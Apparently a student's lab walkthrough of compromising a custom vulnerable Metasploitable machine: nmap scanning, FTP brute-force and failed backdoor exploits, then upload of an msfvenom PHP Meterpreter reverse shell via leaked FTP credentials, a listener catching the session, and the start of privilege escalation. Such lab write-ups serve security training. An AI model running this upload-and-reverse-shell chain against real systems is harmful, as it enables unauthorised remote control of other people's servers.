👾Metasploitable (Custom 1)
This is a custom vulnerable machine for a penetration testing module. I had to use the provided leaked information to perform tasks and gain root privileges within a given set of time.
This documentation consists of both failed and succeeded attempts to exploit the vulnerable custom machine. There is a table of contents on the right when this page is viewed on the desktop browser. However, it is not available on a mobile device.
The following expandable Contents Menu, which consists of successful exploitations, is to assist viewing of the page on a mobile device.
Contents
Recon: N.A
Reconnaissance was not needed as I was provided with the following leaked credentials:
Username: xxxx
Password: xxxx
Scanning: Nmap
The target IP address was 192.168.249.147
-p-: All ports
--open: Only show open (or possibly open) ports
-sV: Probe open ports to determine service/version info
-A: Enable OS detection, version detection, script scanning, and traceroute
-O: Enable OS detection
-vvvv: Increase verbosity level (use -vv or more for greater effect)
-oA: Output in the three major formats at once
┌──(kali㉿kali)-[~/custom1]
└─$ sudo nmap -p- -sV --open 192.168.249.147 -A -O -vvvv -oA MC1svOpen
[sudo] password for kali:
Starting Nmap 7.92 ( https://nmap.org ) at 2022-03-25 18:20 +08
NSE: Loaded 155 scripts for scanning.
NSE: Script Pre-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 18:20
Completed NSE at 18:20, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 18:20
Completed NSE at 18:20, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 18:20
Completed NSE at 18:20, 0.00s elapsed
Initiating ARP Ping Scan at 18:20
Scanning 192.168.249.147 [1 port]
Completed ARP Ping Scan at 18:20, 0.06s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 18:20
Completed Parallel DNS resolution of 1 host. at 18:20, 0.01s elapsed
DNS resolution of 1 IPs took 0.01s. Mode: Async [#: 1, OK: 0, NX: 1, DR: 0, SF: 0, TR: 1, CN: 0]
Initiating SYN Stealth Scan at 18:20
Scanning 192.168.249.147 [65535 ports]
Discovered open port 139/tcp on 192.168.249.147
Discovered open port 80/tcp on 192.168.249.147
Discovered open port 21/tcp on 192.168.249.147
Discovered open port 50981/tcp on 192.168.249.147
Discovered open port 2121/tcp on 192.168.249.147
Discovered open port 42984/tcp on 192.168.249.147
Discovered open port 60976/tcp on 192.168.249.147
Discovered open port 36196/tcp on 192.168.249.147
Completed SYN Stealth Scan at 18:20, 6.68s elapsed (65535 total ports)
Initiating Service scan at 18:20
Scanning 8 services on 192.168.249.147
Completed Service scan at 18:22, 126.20s elapsed (8 services on 1 host)
Initiating OS detection (try #1) against 192.168.249.147
NSE: Script scanning 192.168.249.147.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 18:22
Completed NSE at 18:22, 0.40s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 18:22
Completed NSE at 18:22, 0.37s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 18:22
Completed NSE at 18:22, 0.00s elapsed
Nmap scan report for 192.168.249.147
Host is up, received arp-response (0.00087s latency).
Scanned at 2022-03-25 18:20:02 +08 for 135s
Not shown: 65505 closed tcp ports (reset), 22 filtered tcp ports (no-response)
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT STATE SERVICE REASON VERSION
21/tcp open ftp syn-ack ttl 64 vsftpd (broken: cannot locate user specified in 'ftp_username':ftp)
80/tcp open http syn-ack ttl 64 Apache httpd 2.2.8 ((Ubuntu) DAV/2)
|_http-server-header: Apache/2.2.8 (Ubuntu) DAV/2
| http-methods:
| Supported Methods: GET HEAD POST OPTIONS TRACE
|_ Potentially risky methods: TRACE
|_http-title: Site doesn't have a title (text/html).
139/tcp open netbios-ssn syn-ack ttl 64 Samba smbd 3.0.20-Debian (workgroup: WORKGROUP)
2121/tcp open ftp syn-ack ttl 64 ProFTPD 1.3.1
36196/tcp open mountd syn-ack ttl 64 1-3 (RPC #100005)
42984/tcp open status syn-ack ttl 64 1 (RPC #100024)
50981/tcp open java-rmi syn-ack ttl 64 GNU Classpath grmiregistry
60976/tcp open nlockmgr syn-ack ttl 64 1-4 (RPC #100021)
MAC Address: 00:0C:29:59:43:B7 (VMware)
Device type: general purpose
Running: Linux 2.6.X
OS CPE: cpe:/o:linux:linux_kernel:2.6
OS details: Linux 2.6.9 - 2.6.33
TCP/IP fingerprint:
OS:SCAN(V=7.92%E=4%D=3/25%OT=21%CT=1%CU=31948%PV=Y%DS=1%DC=D%G=Y%M=000C29%T
OS:M=623D97D9%P=x86_64-pc-linux-gnu)SEQ(SP=CC%GCD=1%ISR=CD%TI=Z%CI=Z%II=I%T
OS:S=7)OPS(O1=M5B4ST11NW5%O2=M5B4ST11NW5%O3=M5B4NNT11NW5%O4=M5B4ST11NW5%O5=
OS:M5B4ST11NW5%O6=M5B4ST11)WIN(W1=16A0%W2=16A0%W3=16A0%W4=16A0%W5=16A0%W6=1
OS:6A0)ECN(R=Y%DF=Y%T=40%W=16D0%O=M5B4NNSNW5%CC=N%Q=)T1(R=Y%DF=Y%T=40%S=O%A
OS:=S+%F=AS%RD=0%Q=)T2(R=N)T3(R=Y%DF=Y%T=40%W=16A0%S=O%A=S+%F=AS%O=M5B4ST11
OS:NW5%RD=0%Q=)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(R=Y%DF=Y%T=40
OS:%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q
OS:=)T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%T=40%IPL=164
OS:%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=40%CD=S)
Uptime guess: 0.007 days (since Fri Mar 25 18:12:13 2022)
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=204 (Good luck!)
IP ID Sequence Generation: All zeros
Service Info: OS: Unix
Host script results:
|_clock-skew: mean: 2h00m05s, deviation: 2h49m42s, median: 5s
| nbstat: NetBIOS name: custom1, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| Names:
| custom1<00> Flags: <unique><active>
| custom1<03> Flags: <unique><active>
| custom1<20> Flags: <unique><active>
| \x01\x02__MSBROWSE__\x02<01> Flags: <group><active>
| WORKGROUP<00> Flags: <group><active>
| WORKGROUP<1d> Flags: <unique><active>
| WORKGROUP<1e> Flags: <group><active>
| Statistics:
| 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
| 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
|_ 00 00 00 00 00 00 00 00 00 00 00 00 00 00
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| p2p-conficker:
| Checking for Conficker.C or higher...
| Check 1 (port 8478/tcp): CLEAN (Couldn't connect)
| Check 2 (port 31899/tcp): CLEAN (Couldn't connect)
| Check 3 (port 31092/udp): CLEAN (Failed to receive data)
| Check 4 (port 54355/udp): CLEAN (Failed to receive data)
|_ 0/4 checks are positive: Host is CLEAN or ports are blocked
|_smb2-security-mode: Couldn't establish a SMBv2 connection.
|_smb2-time: Protocol negotiation failed (SMB2)
| smb-os-discovery:
| OS: Unix (Samba 3.0.20-Debian)
| Computer name: custom1
| NetBIOS computer name:
| Domain name:
| FQDN: custom1
|_ System time: 2022-03-25T06:22:22-04:00
TRACEROUTE
HOP RTT ADDRESS
1 0.87 ms 192.168.249.147
NSE: Script Post-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 18:22
Completed NSE at 18:22, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 18:22
Completed NSE at 18:22, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 18:22
Completed NSE at 18:22, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 135.55 seconds
Raw packets sent: 65629 (2.888MB) | Rcvd: 65529 (2.622MB)
Nmap done: 1 IP address (1 host up) scanned in 135.55 seconds🤔💭 Nmap took 135.55 seconds (about 2.25 mins) which wasn't too long at all for the flags used to find the following information
PORT STATE SERVICE REASON VERSION
21/tcp open ftp syn-ack ttl 64 vsftpd (broken: cannot locate user specified in 'ftp_username':ftp)
80/tcp open http syn-ack ttl 64 Apache httpd 2.2.8 ((Ubuntu) DAV/2)
|_http-server-header: Apache/2.2.8 (Ubuntu) DAV/2
| http-methods:
| Supported Methods: GET HEAD POST OPTIONS TRACE
|_ Potentially risky methods: TRACE
|_http-title: Site doesn't have a title (text/html).
139/tcp open netbios-ssn syn-ack ttl 64 Samba smbd 3.0.20-Debian (workgroup: WORKGROUP)
2121/tcp open ftp syn-ack ttl 64 ProFTPD 1.3.1
36196/tcp open mountd syn-ack ttl 64 1-3 (RPC #100005)
42984/tcp open status syn-ack ttl 64 1 (RPC #100024)
50981/tcp open java-rmi syn-ack ttl 64 GNU Classpath grmiregistry
60976/tcp open nlockmgr syn-ack ttl 64 1-4 (RPC #100021)👎 Enumeration: "Failed" FTP (NSE)
For Enumeration, I will use Nmap Scripting Engine (NSE) to search for any potential information for the following FTP services
PORT STATE SERVICE REASON VERSION
21/tcp open ftp syn-ack ttl 64 vsftpd (broken: cannot locate user specified in 'ftp_username':ftp)
2121/tcp open ftp syn-ack ttl 64 ProFTPD 1.3.1nmap -sV -p 2121 192.168.249.147 --script=ftp-proftpd-backdoor
┌──(kali㉿kali)-[~/custom1]
└─$ nmap -sV -p 2121 192.168.249.147 --script=ftp-proftpd-backdoor
Starting Nmap 7.92 ( https://nmap.org ) at 2022-03-26 19:48 +08
Nmap scan report for 192.168.249.147
Host is up (0.0025s latency).
PORT STATE SERVICE VERSION
2121/tcp open ftp ProFTPD 1.3.1
Service Info: OS: Unix
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 0.40 secondsnmap -sV -p 21 192.168.249.147 --script=ftp-vsftpd-backdoor
┌──(kali㉿kali)-[~/custom1]
└─$ nmap -sV -p 21 192.168.249.147 --script=ftp-vsftpd-backdoor
Starting Nmap 7.92 ( https://nmap.org ) at 2022-03-26 19:52 +08
Nmap scan report for 192.168.249.147
Host is up (0.0063s latency).
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd (broken: cannot locate user specified in 'ftp_username':ftp)
Service Info: OS: Unix
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 1.26 secondsnmap -sV -p 21 192.168.249.147 --script=ftp-brute
──(kali㉿kali)-[~/custom1]
└─$ nmap -sV -p 21 192.168.249.147 --script=ftp-brute
Starting Nmap 7.92 ( https://nmap.org ) at 2022-03-26 19:54 +08
NSE: [ftp-brute] usernames: Time limit 10m00s exceeded.
Nmap scan report for 192.168.249.147
Host is up (0.00061s latency).
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd (broken: cannot locate user specified in 'ftp_username':ftp)
| ftp-brute:
| Accounts: No valid accounts found
|_ Statistics: Performed 830763 guesses in 600 seconds, average tps: 1425.3
Service Info: OS: Unix
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 600.31 secondsnmap -sV -p 2121 192.168.249.147 --script=ftp-brute
┌──(kali㉿kali)-[~/custom1]
└─$ nmap -sV -p 2121 192.168.249.147 --script=ftp-brute
Starting Nmap 7.92 ( https://nmap.org ) at 2022-03-26 20:08 +08
NSE: [ftp-brute] passwords: Time limit 10m00s exceeded.
Nmap scan report for 192.168.249.147
Host is up (0.00069s latency).
PORT STATE SERVICE VERSION
2121/tcp open ftp ProFTPD 1.3.1
| ftp-brute:
| Accounts: No valid accounts found
|_ Statistics: Performed 49434 guesses in 607 seconds, average tps: 74.1
Service Info: OS: Unix
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 607.36 seconds🤔💭 I wasn't able to find any additional information using NSE
👎 Exploitation: "Failed" FTP (Msfconsole)
Using the information from the Nmap scan results, I can attempt to access the 2 FTP ports
🤔💭 There is a hint that port 21 vsftpd is not working. However I will still try using Msfconsole just to make sure
vsftpd (broken: cannot locate user specified in 'ftp_username':ftp)Execute msfconsole
──(kali㉿kali)-[~/custom1]
└─$ msfconsole
# cowsay++
____________
< metasploit >
------------
\ ,__,
\ (oo)____
(__) )\
||--|| *
=[ metasploit v6.1.27-dev ]
+ -- --=[ 2196 exploits - 1162 auxiliary - 400 post ]
+ -- --=[ 596 payloads - 45 encoders - 10 nops ]
+ -- --=[ 9 evasion ]
Metasploit tip: Use the edit command to open the
currently active module in your editor
msf6 >search vsftpd
msf6 > search vsftpd
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 exploit/unix/ftp/vsftpd_234_backdoor 2011-07-03 excellent No VSFTPD v2.3.4 Backdoor Command Execution
Interact with a module by name or index. For example info 0, use 0 or use exploit/unix/ftp/vsftpd_234_backdoor
msf6 >use exploit/unix/ftp/vsftpd_234_backdoor
options
set rhosts 192.168.249.147 <target IP>
msf6 > use exploit/unix/ftp/vsftpd_234_backdoor
msf6 exploit(unix/ftp/vsftpd_234_backdoor) > options
Module options (exploit/unix/ftp/vsftpd_234_backdoor):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOSTS 192.168.249.147 yes The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using
-Metasploit
RPORT 21 yes The target port (TCP)
Payload options (cmd/unix/interact):
Name Current Setting Required Description
---- --------------- -------- -----------
Exploit target:
Id Name
-- ----
0 Automatic
msf6 exploit(unix/ftp/vsftpd_234_backdoor) >
run
msf6 exploit(unix/ftp/vsftpd_234_backdoor) > run
[*] 192.168.249.147:21 - Banner: 500 OOPS: vsftpd: cannot locate user specified in 'ftp_username':ftp
[-] 192.168.249.147:21 - Exploit failed: EOFError EOFError
[*] Exploit completed, but no session was created.
msf6 exploit(unix/ftp/vsftpd_234_backdoor) > 🤔💭 True enough, no session was created. I will try port 2121 ProFTPD and see how it goes
search proftp
msf6 > search proftp
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 exploit/linux/misc/netsupport_manager_agent 2011-01-08 average No NetSupport Manager Agent Remote Buffer Overflow
1 exploit/windows/ftp/proftp_banner 2009-08-25 normal No ProFTP 2.9 Banner Remote Buffer Overflow
2 exploit/linux/ftp/proftp_sreplace 2006-11-26 great Yes ProFTPD 1.2 - 1.3.0 sreplace Buffer Overflow (Linux)
3 exploit/freebsd/ftp/proftp_telnet_iac 2010-11-01 great Yes ProFTPD 1.3.2rc3 - 1.3.3b Telnet IAC Buffer Overflow (FreeBSD)
4 exploit/linux/ftp/proftp_telnet_iac 2010-11-01 great Yes ProFTPD 1.3.2rc3 - 1.3.3b Telnet IAC Buffer Overflow (Linux)
5 exploit/unix/ftp/proftpd_modcopy_exec 2015-04-22 excellent Yes ProFTPD 1.3.5 Mod_Copy Command Execution
6 exploit/unix/ftp/proftpd_133c_backdoor 2010-12-02 excellent No ProFTPD-1.3.3c Backdoor Command Execution
Interact with a module by name or index. For example info 6, use 6 or use exploit/unix/ftp/proftpd_133c_backdoor
msf6 >
🤔💭 However the results were not ideal as there isn't a ProFTPD with version 1.3.1
👌 Exploitation: "It Worked" FTP (Login) / Apache
The following leaked information was provided for this exercise:
Username: xxxx
Password: xxxx
We have the following 2 FTP ports to explore with
PORT STATE SERVICE REASON VERSION
21/tcp open ftp syn-ack ttl 64 vsftpd (broken: cannot locate user specified in 'ftp_username':ftp)
2121/tcp open ftp syn-ack ttl 64 ProFTPD 1.3.1I will try to connect to the default FTP port 21 first
ftp 192.168.249.147
┌──(kali㉿kali)-[~]
└─$ ftp 192.168.249.147
Connected to 192.168.249.147.
500 OOPS: vsftpd: cannot locate user specified in 'ftp_username':ftp
ftp> 🤔💭 It returned with the following errors:
500 OOPS: vsftpd: cannot locate user specified in 'ftp_username':ftpNext, I will try to connect to FTP port 2121
ftp 192.168.249.147 2121
┌──(kali㉿kali)-[~]
└─$ ftp 192.168.249.147 2121
Connected to 192.168.249.147.
220 ProFTPD 1.3.1 Server (Debian) [::ffff:192.168.249.147]
Name (192.168.249.147:kali): xxxx
331 Password required for xxxx
Password:
230 User xxxx logged in
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> Let me check where is the remote directory that I managed to log into
pwd
ftp> pwd
Remote directory: /home/xxxx
ftp> I will execute 'ls' to check what are the available files and directories
ls
ftp> ls
229 Entering Extended Passive Mode (|||16006|)
150 Opening ASCII mode data connection for file list
drwxr-xr-x 4 xxxx xxxx 4096 Mar 25 13:51 AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
-rw-r--r-- 1 xxxx xxxx 203 Sep 9 2021 index.html
-rw-r--r-- 1 xxxx xxxx 92905 Sep 9 2021 it.jpg
-rw-r--r-- 1 xxxx xxxx 169 Sep 9 2021 phonenumbers.txt
226 Transfer complete
ftp> 🤔💭 There s an 'index.html' and earlier I noticed that port 80 is running the Apache service
80/tcp open http syn-ack ttl 64 Apache httpd 2.2.8 ((Ubuntu) DAV/2)I can download the index.html file using the ftp's 'get' command to check if the content is the same as when I access the target IP address using 'curl' command or the internet browser
get index.htm
ftp> get index.html
local: index.html remote: index.html
229 Entering Extended Passive Mode (|||28981|)
150 Opening BINARY mode data connection for index.html (203 bytes)
100% |****************************************************************************************************************| 203 6.91 MiB/s 00:00 ETA
226 Transfer complete
203 bytes received in 00:00 (183.04 KiB/s)
ftp> After downloading the index.html file, I will be able to execute the 'cat' command to see its contents
cat index.html
┌──(kali㉿kali)-[~/custom1/ftpm]
└─$ cat index.html
<html>
<body>
<h2>The IT team at your service</h2>
<p>Before you call us, make sure the button on the side is glowing.. </p>
<img src="it.jpg" alt="it.crew" width="1040" height="600">
</body>
</html>Next, I will execute the 'curl' command to transfer data from the target IP URL for comparison
curl 192.168.249.147
┌──(kali㉿kali)-[~/custom1/ftpm]
└─$ curl 192.168.249.147
<html>
<body>
<h2>The IT team at your service</h2>
<p>Before you call us, make sure the button on the side is glowing.. </p>
<img src="it.jpg" alt="it.crew" width="1040" height="600">
</body>
</html>🤔💭 Both the results are identical!
🤔💭 The default directory for Apache service should be /var/www/html. However for this machine, it was configured to the /home/xxxx directory instead as what we had discovered earlier.
Reference: https://httpd.apache.org/docs/trunk/getting-started.html#content
👌 Exploitation: "It Worked" FTP / Apache (Msfvenom Payload)
First I will check what php payloads are available from Msfvenom
msfvenom -l payloads | grep php
┌──(kali㉿kali)-[~/custom1/ftpm]
└─$ msfvenom -l payloads | grep php
cmd/unix/reverse_php_ssl Creates an interactive shell via php, uses SSL
php/bind_perl Listen for a connection and spawn a command shell via perl (persistent)
php/bind_perl_ipv6 Listen for a connection and spawn a command shell via perl (persistent) over IPv6
php/bind_php Listen for a connection and spawn a command shell via php
php/bind_php_ipv6 Listen for a connection and spawn a command shell via php (IPv6)
php/download_exec Download an EXE from an HTTP URL and execute it
php/exec Execute a single system command
php/meterpreter/bind_tcp Run a meterpreter server in PHP. Listen for a connection
php/meterpreter/bind_tcp_ipv6 Run a meterpreter server in PHP. Listen for a connection over IPv6
php/meterpreter/bind_tcp_ipv6_uuid Run a meterpreter server in PHP. Listen for a connection over IPv6 with UUID Support
php/meterpreter/bind_tcp_uuid Run a meterpreter server in PHP. Listen for a connection with UUID Support
php/meterpreter/reverse_tcp Run a meterpreter server in PHP. Reverse PHP connect back stager with checks for disabled functions
php/meterpreter/reverse_tcp_uuid Run a meterpreter server in PHP. Reverse PHP connect back stager with checks for disabled functions
php/meterpreter_reverse_tcp Connect back to attacker and spawn a Meterpreter server (PHP)
php/reverse_perl Creates an interactive shell via perl
php/reverse_php Reverse PHP connect back shell with checks for disabled functions
php/shell_findsock Spawn a shell on the established connection to the webserver. Unfortunately, this payload can leave conspicuous evil-looking entries in the apache error logs, so it is probably a good idea to use a bind or reverse shell unless firewalls prevent them from working. The issue this payload takes advantage of (CLOEXEC flag not set on sockets) appears to have been patched on the Ubuntu version of Apache and may not work on other Debian-based distributions. Only tested on Apache but it might work on other web servers that leak file descriptors to child processes.
windows/dllinject/reverse_hop_http Inject a DLL via a reflective loader. Tunnel communication over an HTTP or HTTPS hop point. Note that you must first upload data/hop/hop.php to the PHP server you wish to use as a hop.
windows/meterpreter/reverse_hop_http Inject the Meterpreter server DLL via the Reflective Dll Injection payload (staged). Requires Windows XP SP2 or newer. Tunnel communication over an HTTP or HTTPS hop point. Note that you must first upload data/hop/hop.php to the PHP server you wish to use as a hop.
windows/vncinject/reverse_hop_http Inject a VNC Dll via a reflective loader (staged). Tunnel communication over an HTTP or HTTPS hop point. Note that you must first upload data/hop/hop.php to the PHP server you wish to use as a hop.I will take a look at the options for the 'php/meterpreter_reverse_tcp' payload
msfvenom -p php/meterpreter_reverse_tcp --list-options
┌──(kali㉿kali)-[~/custom1/ftpm]
└─$ msfvenom -p php/meterpreter_reverse_tcp --list-options
Options for payload/php/meterpreter_reverse_tcp:
=========================
Name: PHP Meterpreter, Reverse TCP Inline
Module: payload/php/meterpreter_reverse_tcp
Platform: PHP
Arch: php
Needs Admin: No
Total size: 34276
Rank: Normal
Provided by:
egypt <egypt@metasploit.com>
Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Description:
Connect back to attacker and spawn a Meterpreter server (PHP)
Advanced options for payload/php/meterpreter_reverse_tcp:
=========================
Name Current Setting Required Description
---- --------------- -------- -----------
AutoLoadStdapi true yes Automatically load the Stdapi extension
AutoRunScript no A script to run automatically on session creation.
AutoSystemInfo true yes Automatically capture system information on initialization.
AutoUnhookProcess false yes Automatically load the unhook extension and unhook the process
AutoVerifySessionTimeout 30 no Timeout period to wait for session validation to occur, in seconds
EnableUnicodeEncoding false yes Automatically encode UTF-8 strings as hexadecimal
HandlerSSLCert no Path to a SSL certificate in unified PEM format, ignored for HTTP transports
InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript)
PayloadProcessCommandLine no The displayed command line that will be used by the payload
PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking)
PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID
PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic)
PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs
ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go throug
h proxy but directly to LHOST
ReverseListenerBindAddress no The specific IP address to bind to on the local system
ReverseListenerBindPort no The port to bind to on the local system if different from LPORT
ReverseListenerComm no The specific communication channel to use for this listener
ReverseListenerThreaded false yes Handle every connection in a new thread (experimental)
SessionCommunicationTimeout 300 no The number of seconds of no activity before this session should be killed
SessionExpirationTimeout 604800 no The number of seconds before this session should be forcibly shut down
SessionRetryTotal 3600 no Number of seconds try reconnecting for on network failure
SessionRetryWait 10 no Number of seconds to wait between reconnect attempts
StagerRetryCount 10 no The number of times the stager should retry if the first connect fails
StagerRetryWait 5 no Number of seconds to wait for the stager between reconnect attempts
VERBOSE false no Enable detailed status messages
WORKSPACE no Specify the workspace for this module
Evasion options for payload/php/meterpreter_reverse_tcp:
=========================
Name Current Setting Required Description
---- --------------- -------- -----------I will proceed to create a payload named 'payload.php' with Msfvenom
msfvenom -p php/meterpreter_reverse_tcp lhost=192.168.249.140 lport=5566 -f raw -o payload.php
┌──(kali㉿kali)-[~/custom1/ftpm]
└─$ msfvenom -p php/meterpreter_reverse_tcp lhost=192.168.249.140 lport=5566 -f raw -o payload.php
[-] No platform was selected, choosing Msf::Module::Platform::PHP from the payload
[-] No arch selected, selecting arch: php from the payload
No encoder specified, outputting raw payload
Payload size: 34282 bytes
Saved as: payload.phpNext, I will connect to the target using FTP and upload the 'payload.php' file using the 'put' command
put payload.php
┌──(kali㉿kali)-[~/custom1/ftpm]
└─$ ftp 192.168.249.147 2121
Connected to 192.168.249.147.
220 ProFTPD 1.3.1 Server (Debian) [::ffff:192.168.249.147]
Name (192.168.249.147:kali): xxxx
331 Password required for xxxx
Password:
230 User xxxx logged in
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> put payload.php
local: payload.php remote: payload.php
229 Entering Extended Passive Mode (|||47813|)
150 Opening BINARY mode data connection for payload.php
100% |***********************************************************************************************| 34282 67.13 MiB/s 00:00 ETA
226 Transfer complete
34282 bytes sent in 00:00 (28.47 MiB/s)
ftp>Execute 'ls' to confirm that the payload has been uploaded successfully
ls
ftp> ls
229 Entering Extended Passive Mode (|||57862|)
150 Opening ASCII mode data connection for file list
drwxr-xr-x 4 xxxx xxxx 4096 Mar 25 13:51 AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
-rw-r--r-- 1 xxxx xxxx 203 Sep 9 2021 index.html
-rw-r--r-- 1 xxxx xxxx 92905 Sep 9 2021 it.jpg
-rw-r--r-- 1 xxxx xxxx 34282 Mar 28 06:33 payload.php
-rw-r--r-- 1 xxxx xxxx 169 Sep 9 2021 phonenumbers.txt
226 Transfer complete
ftp> 👎 Exploitation: "Failed" Listener (Msfconsole)
I will fire up Msfconsole to create a listener
msfconsole
──(kali㉿kali)-[~]
└─$ msfconsole
MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM
MMMMMMMMMMM MMMMMMMMMM
MMMN$ vMMMM
MMMNl MMMMM MMMMM JMMMM
MMMNl MMMMMMMN NMMMMMMM JMMMM
MMMNl MMMMMMMMMNmmmNMMMMMMMMM JMMMM
MMMNI MMMMMMMMMMMMMMMMMMMMMMM jMMMM
MMMNI MMMMMMMMMMMMMMMMMMMMMMM jMMMM
MMMNI MMMMM MMMMMMM MMMMM jMMMM
MMMNI MMMMM MMMMMMM MMMMM jMMMM
MMMNI MMMNM MMMMMMM MMMMM jMMMM
MMMNI WMMMM MMMMMMM MMMM# JMMMM
MMMMR ?MMNM MMMMM .dMMMM
MMMMNm `?MMM MMMM` dMMMMM
MMMMMMN ?MM MM? NMMMMMN
MMMMMMMMNe JMMMMMNMMM
MMMMMMMMMMNm, eMMMMMNMMNMM
MMMMNNMNMMMMMNx MMMMMMNMMNMMNM
MMMMMMMMNMMNMMMMm+..+MMNMMNMNMMNMMNMM
https://metasploit.com
=[ metasploit v6.1.27-dev ]
+ -- --=[ 2196 exploits - 1162 auxiliary - 400 post ]
+ -- --=[ 596 payloads - 45 encoders - 10 nops ]
+ -- --=[ 9 evasion ]
Metasploit tip: Search can apply complex filters such as
search cve:2009 type:exploit, see all the filters
with help search
msf6 >use exploit/multi/handler
msf6 > use exploit/multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) >I will need to set the correct payload as to what I have set in Msfvenom
set payload /php/meterpreter_reverse_tcp
set lhost 192.168.249.140
set lport 5566
options
msf6 exploit(multi/handler) > set payload /php/meterpreter_reverse_tcp
payload => php/meterpreter_reverse_tcp
msf6 exploit(multi/handler) > set lhost 192.168.249.140
lhost => 192.168.249.140
msf6 exploit(multi/handler) > set lport 5566
lport => 5566
msf6 exploit(multi/handler) > options
Module options (exploit/multi/handler):
Name Current Setting Required Description
---- --------------- -------- -----------
Payload options (php/meterpreter_reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST 192.168.249.140 yes The listen address (an interface may be specified)
LPORT 5566 yes The listen port
Exploit target:
Id Name
-- ----
0 Wildcard Targetrun
msf6 exploit(multi/handler) > run
[*] Started reverse TCP handler on 192.168.249.140:5566 
To execute the payload, I simply visit the URL 192.168.249.147/payload.php as shown in Figure 2 or execute 'curl 192.168.249.147/payload.php'
┌──(kali㉿kali)-[~/custom1/ftpm]
└─$ curl 192.168.249.147/payload.php[*] Meterpreter session 1 opened (192.168.249.140:5566 -> 192.168.249.147:57775 ) at 2022-03-28 14:48:03 +0800
meterpreter > I will proceed to examine the Meterpreter session that I managed to gain
getuid
sysinfo
meterpreter > getuid
Server username: www-data
meterpreter > sysinfo
Computer : custom1
OS : Linux custom1 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686
Meterpreter : php/linux
meterpreter >🤔💭 'www-data' user is with low privilege and I will need to escalate the privilege
I will try using Msfconsole suggester to see what if there are any potential exploits available
Firstly I will send the Meterpreter session to the background
background
meterpreter > background
[*] Backgrounding session 1...
msf6 exploit(multi/handler) > search suggester
msf6 exploit(multi/handler) > search suggester
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 post/multi/recon/local_exploit_suggester normal No Multi Recon Local Exploit Suggester
Interact with a module by name or index. For example info 0, use 0 or use post/multi/recon/local_exploit_suggester
msf6 exploit(multi/handler) >I will use the 'suggester' and set it to the Meterpreter session which is 'session 1'
use post/multi/recon/local_exploit_suggester
